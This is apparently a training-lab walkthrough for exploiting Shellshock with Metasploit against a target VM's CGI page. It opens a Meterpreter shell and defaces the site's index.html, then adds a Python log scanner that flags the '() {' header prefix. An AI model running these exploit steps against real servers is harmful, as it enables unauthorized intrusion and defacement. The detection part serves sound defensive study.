- Open 'VMWare Workstation Pro'
- Click on 'Kali Linux 2021' on the left side list of VMs
- Right click again on 'Kali Linux 2021' and click 'Settings'.
- Select 'Network Adapter' and change it to 'Bridged'
- Hit the Play Button to start the VM.
- Username: kali
- Password: kali
- Click the top left logo to search for Firefox.
- Open your browser and head to http://<TARGET_IP>:8080
- Click the Black Box with the "$_" to open the terminal.
This will open the Metasploit Console.
msfconsole
Here, you are searching for Metasploit modules related to the Shellshock vulnerability.
search shellshock
This selects the Shellshock exploit module from the search results.
use 1
This shows the module and payload options that will be configured.
options
Setting the vulnerable CGI page to use.
set targeturi /cgi-bin/vulnerable
Setting the target hosting the site that we will attack.
set rhosts <TARGET_IP>
Setting the port the website is being hosted on.
set rport 8080
Attack the box!
exploit
With your meterpreter shell, now you can modify the website.
Most websites by default keep their files in /var/www. In our case, the index.html file contains the main page of the website.
Use the edit /var/www/index.html command to edit the file. Add your name to the website!
- Once you are in the text editor, press the 'i' key to go into insert mode.
- Use the arrow keys to move down to the <li> section
- Once you add your name, hit the 'ESC' key, type ':wq' and hit 'Enter'
Now visit the website in your browser and see your name publicly hosted on the target site!!
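
Seen from the defender's side, a Shellshock attempt carries a bash function definition (a value starting with "() {") in a request header, and when that header is one the web server logs, the attempt is visible in the access log. The script below is an added example, not part of the original lab: it scans access-log lines for that prefix, and it assumes the Apache "combined" log format; the sample lines, addresses and the function name are constructed for illustration.

```python
import re

# Apache "combined" format (assumed):
# host ident user [time] "request" status size "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<request>(?:[^"\\]|\\.)*)" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>(?:[^"\\]|\\.)*)" "(?P<agent>(?:[^"\\]|\\.)*)"$'
)
# Bash function-definition prefix at the start of a header value.
FUNC_DEF_RE = re.compile(r'^\s*\(\)\s*\{')

# Constructed sample lines; addresses are from documentation ranges.
SAMPLE_LOG = """\
192.0.2.10 - - [01/Jan/2024:10:00:01 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0 (X11; Linux x86_64)"
198.51.100.7 - - [01/Jan/2024:10:02:13 +0000] "GET /cgi-bin/vulnerable HTTP/1.1" 200 0 "-" "() { :; }; <constructed-placeholder>"
192.0.2.10 - - [01/Jan/2024:10:03:40 +0000] "GET /cgi-bin/vulnerable HTTP/1.1" 200 87 "-" "curl/8.0 (test) { ok }"
198.51.100.9 - - [01/Jan/2024:10:05:02 +0000] "GET /index.html HTTP/1.1" 200 512 "() {:;}; <constructed-placeholder>" "Mozilla/5.0"
"""

def find_shellshock_attempts(log_text):
    """Return one finding per line whose Referer or User-Agent starts with '() {'."""
    findings = []
    for lineno, line in enumerate(log_text.splitlines(), 1):
        m = LOG_RE.match(line)
        if not m:
            continue  # not in the assumed format; skip rather than guess
        parts = m.group("request").split()
        path = parts[1] if len(parts) >= 2 else ""
        for field in ("referer", "agent"):
            if FUNC_DEF_RE.match(m.group(field)):
                findings.append({
                    "line": lineno,
                    "src": m.group("src"),
                    "time": m.group("time"),
                    "path": path,
                    "field": field,
                    # Requests to CGI scripts are the ones that hand headers to bash.
                    "cgi": path.startswith("/cgi-bin/"),
                    "status": int(m.group("status")),
                })
                break  # one finding per line is enough
    return findings

if __name__ == "__main__":
    for f in find_shellshock_attempts(SAMPLE_LOG):
        priority = "HIGH (CGI path)" if f["cgi"] else "low (non-CGI path)"
        print(f'line {f["line"]}: {f["src"]} -> {f["path"]} via {f["field"]} [{priority}]')
```

A hit on a CGI path that returned status 200 deserves a follow-up look at the web root for changed files, since editing index.html is exactly what this lab does after the shell opens.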